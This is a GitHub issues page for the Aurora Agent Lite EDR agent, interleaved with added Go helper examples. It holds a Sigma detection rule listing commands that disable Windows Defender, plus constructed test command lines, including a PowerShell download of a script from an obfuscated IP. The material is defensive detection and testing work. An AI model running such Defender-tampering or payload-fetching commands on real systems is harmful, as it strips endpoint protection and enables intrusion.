
aurora-agent-lite's People

Contributors

nasbench


aurora-agent-lite's Issues

Windows Defender detected Trojan:Script/Phonzy.A!ml in Aurora files.

Hi, I just got a high-severity detection from Windows Defender on one of the Aurora yml rules: posh_pc_tamper_windows_defender_set_mp.yml.
It was detected as Trojan:Script/Phonzy.A!ml and quarantined.

Affected elements are:

  • Aurora-Agent\signatures\sigma-rules\public\windows\powershell\powershell_classic\posh_pc_tamper_windows_defender_set_mp.yml
  • Aurora-Agent\signatures\sigma-rules\public\windows\powershell\powershell_script\posh_ps_tamper_windows_defender_set_mp.yml

I'm not sure what part of the file could have triggered it, but it seems to be an ML detection, so maybe it just misunderstood.
Also, Aurora Lite has been installed for about a week, so I'm not sure why it didn't trigger before.

Content of the file:

title: Tamper Windows Defender - ScriptBlockLogging
id: 14c71865-6cd3-44ae-adaa-1db923fae5f2
related:
    - id: ec19ebab-72dc-40e1-9728-4c0b805d722c
      type: derived
status: experimental
description: Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
    - https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps
    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/
author: frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
date: 2022/01/16
modified: 2024/01/02
tags:
    - attack.defense_evasion
    - attack.t1562.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_options_disabling_preference:
        ScriptBlockText|contains: 'Set-MpPreference'
    selection_options_disabling_function:
        ScriptBlockText|contains:
            - '-dbaf $true'
            - '-dbaf 1'
            - '-dbm $true'
            - '-dbm 1'
            - '-dips $true'
            - '-dips 1'
            - '-DisableArchiveScanning $true'
            - '-DisableArchiveScanning 1'
            - '-DisableBehaviorMonitoring $true'
            - '-DisableBehaviorMonitoring 1'
            - '-DisableBlockAtFirstSeen $true'
            - '-DisableBlockAtFirstSeen 1'
            - '-DisableCatchupFullScan $true'
            - '-DisableCatchupFullScan 1'
            - '-DisableCatchupQuickScan $true'
            - '-DisableCatchupQuickScan 1'
            - '-DisableIntrusionPreventionSystem $true'
            - '-DisableIntrusionPreventionSystem 1'
            - '-DisableIOAVProtection $true'
            - '-DisableIOAVProtection 1'
            - '-DisableRealtimeMonitoring $true'
            - '-DisableRealtimeMonitoring 1'
            - '-DisableRemovableDriveScanning $true'
            - '-DisableRemovableDriveScanning 1'
            - '-DisableScanningMappedNetworkDrivesForFullScan $true'
            - '-DisableScanningMappedNetworkDrivesForFullScan 1'
            - '-DisableScanningNetworkFiles $true'
            - '-DisableScanningNetworkFiles 1'
            - '-DisableScriptScanning $true'
            - '-DisableScriptScanning 1'
            - '-MAPSReporting $false'
            - '-MAPSReporting 0'
            - '-drdsc $true'
            - '-drdsc 1'
            - '-drtm $true'
            - '-drtm 1'
            - '-dscrptsc $true'
            - '-dscrptsc 1'
            - '-dsmndf $true'
            - '-dsmndf 1'
            - '-dsnf $true'
            - '-dsnf 1'
            - '-dss $true'
            - '-dss 1'
    selection_other_default_actions_allow:
        ScriptBlockText|contains: 'Set-MpPreference'
    selection_other_default_actions_func:
        ScriptBlockText|contains:
            - 'HighThreatDefaultAction Allow'
            - 'htdefac Allow'
            - 'LowThreatDefaultAction Allow'
            - 'ltdefac Allow'
            - 'ModerateThreatDefaultAction Allow'
            - 'mtdefac Allow'
            - 'SevereThreatDefaultAction Allow'
            - 'stdefac Allow'
    condition: all of selection_options_disabling_* or all of selection_other_default_actions_*
falsepositives:
    - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.
level: high

Not sure if this is considered as a real issue but at least you have the info now.
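As an added example (not part of the issue above and not Aurora's own code), here is the rule's condition evaluated in Go over constructed ScriptBlockText samples. The two string lists are copied from the rule; matching uses Sigma's default case-insensitive `contains`. Two points worth seeing in running code: the rule's literals carry a space between parameter and value, so the equally valid PowerShell form `-DisableRealtimeMonitoring:$true` is not covered; and the file is a plain-text list of exactly the command fragments an AV string classifier is trained on, which is the likely reason a signature file gets quarantined.

```go
package main

import (
	"fmt"
	"strings"
)

// Strings from the rule's selection_options_disabling_function (copied from the rule).
var disablingFlags = []string{
	"-dbaf $true", "-dbaf 1", "-dbm $true", "-dbm 1", "-dips $true", "-dips 1",
	"-DisableArchiveScanning $true", "-DisableArchiveScanning 1",
	"-DisableBehaviorMonitoring $true", "-DisableBehaviorMonitoring 1",
	"-DisableBlockAtFirstSeen $true", "-DisableBlockAtFirstSeen 1",
	"-DisableCatchupFullScan $true", "-DisableCatchupFullScan 1",
	"-DisableCatchupQuickScan $true", "-DisableCatchupQuickScan 1",
	"-DisableIntrusionPreventionSystem $true", "-DisableIntrusionPreventionSystem 1",
	"-DisableIOAVProtection $true", "-DisableIOAVProtection 1",
	"-DisableRealtimeMonitoring $true", "-DisableRealtimeMonitoring 1",
	"-DisableRemovableDriveScanning $true", "-DisableRemovableDriveScanning 1",
	"-DisableScanningMappedNetworkDrivesForFullScan $true", "-DisableScanningMappedNetworkDrivesForFullScan 1",
	"-DisableScanningNetworkFiles $true", "-DisableScanningNetworkFiles 1",
	"-DisableScriptScanning $true", "-DisableScriptScanning 1",
	"-MAPSReporting $false", "-MAPSReporting 0",
	"-drdsc $true", "-drdsc 1", "-drtm $true", "-drtm 1", "-dscrptsc $true", "-dscrptsc 1",
	"-dsmndf $true", "-dsmndf 1", "-dsnf $true", "-dsnf 1", "-dss $true", "-dss 1",
}

// Strings from the rule's selection_other_default_actions_func.
var defaultActionAllow = []string{
	"HighThreatDefaultAction Allow", "htdefac Allow",
	"LowThreatDefaultAction Allow", "ltdefac Allow",
	"ModerateThreatDefaultAction Allow", "mtdefac Allow",
	"SevereThreatDefaultAction Allow", "stdefac Allow",
}

// containsAny mirrors Sigma's `|contains` with a list of values (OR over the values).
// Sigma string matching is case-insensitive by default, so both sides are lower-cased.
func containsAny(text string, needles []string) bool {
	t := strings.ToLower(text)
	for _, n := range needles {
		if strings.Contains(t, strings.ToLower(n)) {
			return true
		}
	}
	return false
}

// MatchTamperDefender evaluates the rule's condition
//   all of selection_options_disabling_* or all of selection_other_default_actions_*
// and reports which branch fired. Both branches require "Set-MpPreference".
func MatchTamperDefender(scriptBlockText string) (bool, string) {
	if !containsAny(scriptBlockText, []string{"Set-MpPreference"}) {
		return false, ""
	}
	if containsAny(scriptBlockText, disablingFlags) {
		return true, "selection_options_disabling"
	}
	if containsAny(scriptBlockText, defaultActionAllow) {
		return true, "selection_other_default_actions"
	}
	return false, ""
}

func main() {
	// Constructed ScriptBlockText samples, not real telemetry.
	samples := []string{
		`Set-MpPreference -DisableRealtimeMonitoring $true`,
		`set-mppreference -drtm 1`,
		`Set-MpPreference -HighThreatDefaultAction Allow`,
		`Set-MpPreference -DisableRealtimeMonitoring $false`,
		`Get-MpPreference | Select-Object DisableRealtimeMonitoring`,
		`Set-MpPreference -DisableRealtimeMonitoring:$true`, // valid PowerShell, no space: not covered
	}
	for _, s := range samples {
		hit, branch := MatchTamperDefender(s)
		fmt.Printf("%-5v %-32s %s\n", hit, branch, s)
	}
}
```

The last sample is the coverage gap: it re-enables nothing and disables real-time monitoring just as the first does, yet none of the rule's substrings occur in it.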

External IP address requests

We are seeing external IP contact attempts from launcher.exe to, at least, the following IP addresses:
208.111.186.0
208.111.186.128
35.196.217.93
34.149.84.181
23.218.218.71
2600:1408:c400:24::17da:d81b
2600:1408:c400:24::17da:d832
23.218.218.70
23.47.204.45
23.204.152.18
23.204.152.20
23.204.152.38
23.204.152.43
23.204.152.45
23.204.152.5
23.215.0.12
23.215.0.13
23.215.0.15
23.215.0.4
23.215.0.5
23.215.0.9
23.218.218.17
23.218.218.24
23.218.218.71
23.218.218.76
23.221.227.25
23.221.227.32
23.221.227.33
23.221.227.38
23.221.227.52
23.221.227.9
23.223.17.164
23.223.17.168
23.47.204.45
23.47.204.46
23.47.204.50
23.47.204.53
23.47.204.54
23.47.204.65
23.47.204.72
23.47.204.74
23.47.204.79
23.47.204.81
23.49.5.196
23.49.5.214
23.53.122.134
23.53.122.137
2600:1404:ec00:45::1724:d9af
2600:1404:ec00:45::1724:d9b0
2600:1407:b800::6872:4f91
2600:1407:b800::6872:4fba
2600:1408:c400:2e::17de:410
2600:1408:c400:2e::17de:41b
2600:1408:ec00:17::17d7:86
2600:1408:ec00:17::17d7:8f
2600:1408:ec00:23::1735:2349
2600:1408:ec00:23::1735:2350
2600:141b:f000:14::172e:9c86
2600:141b:f000:14::172e:9c9e
2600:141b:f000:14::172e:9ca9
2600:141b:f000:14::172e:9cb0
34.149.84.181
35.196.217.93
88.221.134.16
88.221.134.9
88.221.135.208
88.221.135.210
88.221.135.219
88.221.135.89
92.123.140.122
92.123.142.232

What are these attempts for? Does the client update sigma rules via any of these resources? Is there any data from our network being sent anywhere? Thank you for your assistance.

Download Aurora Agent Lite for Windows blocked by BITDEFENDER

Hello,

When downloading Aurora Lite from nextron-systems.com, Bitdefender Total Security detected the aurora-agent-lite-win-pack.zip installation files as dangerous and blocked them.

C:\Users\xxx\Downloads\aurora-agent-lite-win-pack.zip attempted to load a malicious resource detected as Amsi.Edge.22.87AF370A and was blocked. Your device is safe.

Is it useful/advisable to install Aurora Agent Lite in addition to an antivirus to detect possible security compromises?
My goal is to learn how to use an EDR.

THANKS

Good day

Aurora License Issue

I have downloaded the lite version of Aurora EDR, but when I try to download the license file the server displays a "site can't be reached" error.
[screenshot]

License renewal

Hi,

Not sure this is the correct place to report, but I did not get an email after license expiration.
I think I'm still subscribed to the newsletter, but my license expired 12/04 and I did not get the new download link (spam folder checked).

Regards.

About process monitoring

I am making a lightweight Windows process monitoring demo that can sense the start and end of processes in real time. I do not want to use an NT kernel-mode driver, nor ETW or WMI; they have a certain delay, which is a poor fit for instantaneous processes.

My colleague recommended that I look into Aurora; I tried it out, and it worked well.

Can you give me some advice or help with this problem?

AURORA: Error MODULE: Aurora-Agent MESSAGE: unknown command "exclude" for "aurora-agent-util"

Hi,

I tried to exclude processes related to my cybersecurity suite because of the rule 'Potential Antivirus Software DLL Sideloading' (quite efficient, but it generates too many alarms for me).

Procedure I followed: https://aurora-agent-manual.nextron-systems.com/en/latest/usage/aurora-agent-util.html#excluding-processes

I'm facing the error message below:

PS C:\Program Files\Aurora-Agent> .\aurora-agent-util.exe exclude
Error: unknown command "exclude" for "aurora-agent-util"
Run 'aurora-agent-util --help' for usage.
Feb  5 09:08:16 [REDACTED] AURORA: Error MODULE: Aurora-Agent MESSAGE: unknown command "exclude" for "aurora-agent-util"

Result of 'version' command:

PS C:\Program Files\Aurora-Agent> .\aurora-agent-util.exe version
      ___                                  __    _ __
     /   | __  ___________  _________ _   / /   (_) /____
    / /| |/ / / / ___/ __ \/ ___/ __ `/  / /   / / __/ _ \
   / ___ / /_/ / /  / /_/ / /  / /_/ /  / /___/ / /_/  __/
  /_/  |_\__,_/_/   \____/_/   \__,_/  /_____/_/\__/\___/


  Aurora Agent Lite Version 1.1.5 (2a65c69d13bed), Signature Revision 2023/02/04-190348 (Sigma 0.22-1986-gfebefa7e0)
  (C) Nextron Systems GmbH, 2022

Result of 'upgrade' command:

PS C:\Program Files\Aurora-Agent> .\aurora-agent-util.exe upgrade
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: License file found OWNER: [REDACTED] VALID: true VALID_FROM: [REDACTED] VALID_TO: [REDACTED]
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: Checking for new version PRODUCT: aurora-agent-lite-win
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: Already up to date PRODUCT: aurora-agent-lite-win VERSION: 1.1.5
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: No Aurora Agent upgrade available, checking for signature update
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: License file found OWNER: [REDACTED] VALID: true VALID_FROM: [REDACTED] VALID_TO: [REDACTED]
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: Checking for new version PRODUCT: aurora-signatures-lite
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: Already up to date PRODUCT: aurora-signatures-lite VERSION: 23.2.4-190347

Is it due to the use of the free version?

Regards,
WikiJM

Aurora agent log field definitions

We're testing out Aurora Agent Lite and ingesting the logs from the Windows event log into Elasticsearch via Winlogbeat. We are working on creating an ingest pipeline to normalize the data as best we can to ECS, but the manual doesn't specify anything with regard to the log fields. Anything you can provide would be great. Also, the manual says that the event codes used by Aurora logs are internal but doesn't specify what they mean or the differences between them. Anything on that would be great too.
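As an added example (not part of the issue and not a Nextron-documented format), a parser in Go for the record layout visible in the log excerpts pasted in this thread: an optional syslog-style `Mon d HH:MM:SS host` prefix, then `AURORA: <Level>`, then `MODULE: ... MESSAGE: ...` followed by further `KEY: value` pairs, where a key is an upper-case token and a value runs up to the next key. The ECS field choice in `ToECS` is this example's assumption; the sample records are modelled on the ones in this thread with redacted values kept as `[REDACTED]`.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Event is one parsed Aurora log record.
type Event struct {
	Timestamp string            // "May 14 08:23:44" style, no year; empty for the bare "AURORA: Level" form
	Host      string            // empty for the bare form
	Level     string            // Debug, Info, Error, ...
	Fields    map[string]string // MODULE, MESSAGE and the trailing KEY: value pairs
}

var (
	// Optional "Mon  d HH:MM:SS host " prefix, then "AURORA: <Level>", then the body
	// (which may span lines, as in the multi-line form pasted in a later issue).
	headerRe = regexp.MustCompile(`(?s)^(?:([A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) )?AURORA: (\S+)\s*(.*)$`)
	// A field key is an upper-case token followed by ": " at a word boundary, so
	// "C:\Program Files" and "Activity:" inside a value are not split on.
	keyRe = regexp.MustCompile(`\b([A-Z][A-Z0-9_]*): `)
)

// ParseLine splits one record into header and KEY: value fields. Values run up to the
// next key, which is why a MESSAGE containing "rule X: foo" survives intact.
func ParseLine(line string) (Event, error) {
	m := headerRe.FindStringSubmatch(strings.TrimSpace(line))
	if m == nil {
		return Event{}, fmt.Errorf("not an Aurora record: %q", line)
	}
	ev := Event{Timestamp: m[1], Host: m[2], Level: m[3], Fields: map[string]string{}}
	body := m[4]
	locs := keyRe.FindAllStringSubmatchIndex(body, -1)
	for i, loc := range locs {
		end := len(body)
		if i+1 < len(locs) {
			end = locs[i+1][0]
		}
		ev.Fields[body[loc[2]:loc[3]]] = strings.TrimSpace(body[loc[1]:end])
	}
	return ev, nil
}

// ToECS is one possible mapping (this example's choice, not a Nextron-documented one):
// Level -> log.level, Host -> host.name, MODULE -> event.module, MESSAGE -> message,
// everything else under an aurora.* namespace. The syslog-style timestamp has no year,
// so @timestamp is left to the shipper.
func ToECS(ev Event) map[string]string {
	doc := map[string]string{"log.level": strings.ToLower(ev.Level)}
	if ev.Host != "" {
		doc["host.name"] = ev.Host
	}
	for k, v := range ev.Fields {
		switch k {
		case "MODULE":
			doc["event.module"] = v
		case "MESSAGE":
			doc["message"] = v
		default:
			doc["aurora."+strings.ToLower(k)] = v
		}
	}
	return doc
}

func main() {
	// Constructed records modelled on the ones pasted in this thread.
	for _, rec := range []string{
		`May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading sigma rules FOLDER: C:\Program Files\Aurora-Agent\signatures\sigma-rules`,
		`Feb  5 09:18:47 HOST1 AURORA: Info MODULE: Aurora-Agent MESSAGE: License file found OWNER: [REDACTED] VALID: true VALID_FROM: [REDACTED] VALID_TO: [REDACTED]`,
		"AURORA: Error\nMODULE: Sigma\nMESSAGE: Could not compile rule\nERROR: syntax error in selection_ip_3: (?!\nID: cb5a2333-56cf-4562-8fcb-22ba1bca728d",
	} {
		ev, err := ParseLine(rec)
		if err != nil {
			fmt.Println(err)
			continue
		}
		fmt.Println(ToECS(ev))
	}
}
```

Keys are only recognised when they are all upper-case and followed by a colon and a space, so Windows paths and the `rule X: error ...` text inside an ERROR value stay in one field. An empty value followed directly by another key parses as empty, which is the behaviour you want in a pipeline rather than a silently merged field.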

AURORA: Error MODULE: Sigma MESSAGE: Could not compile rule

Hi,

I'm getting an error message about the compilation of a Sigma rule, as follows:

AURORA: Error
MODULE: Sigma
MESSAGE: Could not compile rule
ERROR: syntax error in selection_ip_3 element of rule Obfuscated IP Download Activity: error parsing regexp: invalid or unsupported Perl syntax: (?!
FILE: public\windows\process_creation\proc_creation_win_susp_obfuscated_ip_download.yml
ID: cb5a2333-56cf-4562-8fcb-22ba1bca728d
TITLE: Obfuscated IP Download Activity

It seems to be a problem with lines 37, 39, 41 and 45, which contain the '(?!' symbols. When these lines are commented out, the agent runs normally.
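The error text "invalid or unsupported Perl syntax: (?!" is the wording of Go's RE2-based `regexp` package, which rejects lookahead and lookbehind by design. As an added example (not part of the issue and not the text of the rule in question), the block below reproduces that rejection for a constructed PCRE-style pattern and shows the two RE2-compatible rewrites a rule author has: a lookahead that only enforces a boundary becomes `\b` or a negated class, and a "does not contain" lookahead becomes a separate exclusion combined as selection-and-not-filter, which is the same shape Sigma writes as `condition: selection and not filter`. The pattern, the `allowed-host.example` name and the command lines are this example's assumptions.

```go
package main

import (
	"fmt"
	"regexp"
)

// CompileErr returns the error text Go's RE2-based regexp package produces for a
// pattern, or "" if it compiles.
func CompileErr(pattern string) string {
	if _, err := regexp.Compile(pattern); err != nil {
		return err.Error()
	}
	return ""
}

// pcrePattern is a constructed PCRE-style pattern (not the rule's own): an 8-10 digit
// decimal host not followed by a further digit, excluding command lines that also
// mention a hypothetical allow-listed host. Both lookaheads are rejected by RE2.
const pcrePattern = `^(?!.*allowed-host\.example).*https?://\d{8,10}(?!\d)`

// Rule is the RE2-compatible shape: a positive selection plus an optional exclusion,
// combined in code ("selection and not filter").
type Rule struct {
	Selection *regexp.Regexp
	Filter    *regexp.Regexp // nil when there is nothing to exclude
}

func NewRule(selection, filter string) (*Rule, error) {
	sel, err := regexp.Compile(selection)
	if err != nil {
		return nil, fmt.Errorf("selection: %w", err)
	}
	r := &Rule{Selection: sel}
	if filter != "" {
		if r.Filter, err = regexp.Compile(filter); err != nil {
			return nil, fmt.Errorf("filter: %w", err)
		}
	}
	return r, nil
}

// Match applies "selection and not filter".
func (r *Rule) Match(commandLine string) bool {
	if !r.Selection.MatchString(commandLine) {
		return false
	}
	return r.Filter == nil || !r.Filter.MatchString(commandLine)
}

// RE2 rewrite of pcrePattern: the boundary lookahead (?!\d) becomes \b, and the
// "does not contain" lookahead becomes the filter.
const (
	re2Selection = `https?://\d{8,10}\b`
	re2Filter    = `(?i)allowed-host\.example`
)

func main() {
	fmt.Println("PCRE pattern:", CompileErr(pcrePattern))
	rule, err := NewRule(re2Selection, re2Filter)
	if err != nil {
		panic(err)
	}
	for _, cl := range []string{ // constructed command lines
		`powershell -c "iwr http://3232235777/x.ps1"`,
		`curl http://32322357770000/x`,
		`curl http://3232235777/x -H Host:allowed-host.example`,
		`curl http://192.168.1.1/x`,
	} {
		fmt.Printf("%-5v %s\n", rule.Match(cl), cl)
	}
}
```

Before shipping a rewritten regex into `custom-signatures`, compiling it with `regexp.Compile` (or any RE2 engine) is the cheap check that avoids the agent refusing the whole rule at start-up.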

p/ amsibypass.b

hey,

Any reason why the lite version has p/ amsibypass.b with the download?

could not initialize Module Sigma: could not load sigma rules: no valid sigma rules found

Hi,

Since 12/05, aurora-agent doesn't start.

Debug output:

May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Aurora-Agent MESSAGE: Started CPU limiter LIMIT: 35
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Aurora-Agent MESSAGE: Started offering status information
      ___                                  __    _ __
     /   | __  ___________  _________ _   / /   (_) /____
    / /| |/ / / / ___/ __ \/ ___/ __ `/  / /   / / __/ _ \
   / ___ / /_/ / /  / /_/ / /  / /_/ /  / /___/ / /_/  __/
  /_/  |_\__,_/_/   \____/_/   \__,_/  /_____/_/\__/\___/


  Aurora Agent Lite Version 1.0.5 (1ee787bfd27f7), Signature Revision 2022/05/12-150708 (Sigma 0.21-330-g1f7021fed)
  (C) Nextron Systems GmbH, 2022

May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: EventDistributor MESSAGE: Initialized process excludes EXCLUDES: 1
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ETWSource MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ETWKernelSource MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: EventlogSource MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: PollHandles MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\c2-iocs.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\c2-iocs.dat as 'domains' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\falsepositive-hashes.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\falsepositive-hashes.dat as false positive 'hash' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\filename-iocs.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\filename-iocs.dat as 'filename' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\hash-iocs.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\hash-iocs.dat as 'hash' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\keywords.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\otx-hash-iocs.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\otx-hash-iocs.dat as 'hash' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Hash IOC has invalid length (should be MD5, SHA1 or SHA256) FILE: C:\Program Files\Aurora-Agent\signatures\iocs\otx-hash-iocs.dat STRING: 2d56709dfa628bdb10453b4d23d36491
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 2832 filename ioc strings and 464 filename ioc regexs TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 1666 malware domains TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 49777 malware and 30 false positive hashes TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 0 named pipe ioc strings and 0 named pipe ioc regexs TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 0 malicious handles and 0 regex malicious handles TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Rescontrol MESSAGE: Initializing module
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Initializing module
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading sigma rules FOLDER: C:\Program Files\Aurora-Agent\signatures\sigma-rules
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading sigma rules FOLDER: C:\Program Files\Aurora-Agent\custom-signatures
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading log source SOURCE: C:\Program Files\Aurora-Agent\log-sources\event-log-sources.yml
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading log source SOURCE: C:\Program Files\Aurora-Agent\log-sources\etw-log-sources-standard.yml
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading log source SOURCE: C:\Program Files\Aurora-Agent\log-sources\etw-log-source-mappings.yml
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Compiling sigma rules
could not initialize Module Sigma: could not load sigma rules: no valid sigma rules found

Indeed, the aurora-signatures-lite-pack.zip does not provide any sigma rules:
[screenshot]

I was able to reinstall the rules from the initial package and successfully start the agent, but I guess the next update will break it again.

Great tool anyway and thank you for sharing.

Regards.
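As an added example (not part of the issue and not Aurora's own update logic), a pre-flight check in Go that refuses a signature pack which would leave the agent with no Sigma rules, the state that produced "no valid sigma rules found" at start-up. The zip layout is this example's assumption: rules are taken to sit under a `sigma-rules/` path inside the archive, mirroring the installed `signatures\sigma-rules` folder seen in the debug log, and a file counts as a rule if it carries the `title:`, `logsource:` and `detection:` keys. The test packs are built in memory so the check runs offline.

```go
package main

import (
	"archive/zip"
	"bytes"
	"fmt"
	"io"
	"strings"
)

// looksLikeSigmaRule is a minimal structural check: the keys a Sigma rule must have
// before any engine can compile it.
func looksLikeSigmaRule(content string) bool {
	return strings.Contains(content, "title:") &&
		strings.Contains(content, "logsource:") &&
		strings.Contains(content, "detection:")
}

// CountSigmaRules walks a signature pack and returns how many entries look like Sigma
// rules. Assumption (this example's, not documented by Nextron): rules live under a
// "sigma-rules/" path inside the zip.
func CountSigmaRules(pack []byte) (int, error) {
	zr, err := zip.NewReader(bytes.NewReader(pack), int64(len(pack)))
	if err != nil {
		return 0, fmt.Errorf("not a zip archive: %w", err)
	}
	count := 0
	for _, f := range zr.File {
		name := strings.ToLower(f.Name)
		isYAML := strings.HasSuffix(name, ".yml") || strings.HasSuffix(name, ".yaml")
		if !strings.Contains(name, "sigma-rules/") || !isYAML {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return count, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return count, err
		}
		if looksLikeSigmaRule(string(data)) {
			count++
		}
	}
	return count, nil
}

// CheckPack is the gate to run before replacing the installed signatures: a pack with
// zero usable rules is rejected so the current rule set stays in place.
func CheckPack(pack []byte) error {
	n, err := CountSigmaRules(pack)
	if err != nil {
		return err
	}
	if n == 0 {
		return fmt.Errorf("signature pack contains no valid sigma rules; keeping installed rules")
	}
	return nil
}

// BuildPack builds an in-memory zip from name -> content (constructed test data).
func BuildPack(entries map[string]string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, content := range entries {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		if _, err := w.Write([]byte(content)); err != nil {
			panic(err)
		}
	}
	if err := zw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

// sampleRule is a constructed minimal Sigma rule used only to populate the test packs.
const sampleRule = `title: Example rule
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\whoami.exe'
    condition: selection
level: low
`

func main() {
	good := BuildPack(map[string]string{
		"signatures/sigma-rules/public/windows/example.yml": sampleRule,
		"signatures/iocs/hash-iocs.dat":                     "deadbeef",
	})
	empty := BuildPack(map[string]string{"signatures/iocs/hash-iocs.dat": "deadbeef"})
	fmt.Println("good pack:", CheckPack(good))
	fmt.Println("empty pack:", CheckPack(empty))
}
```

The check deliberately stays at the structural level; the agent's own compile step, which the debug log shows as "Compiling sigma rules", is still what decides whether each rule is usable.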
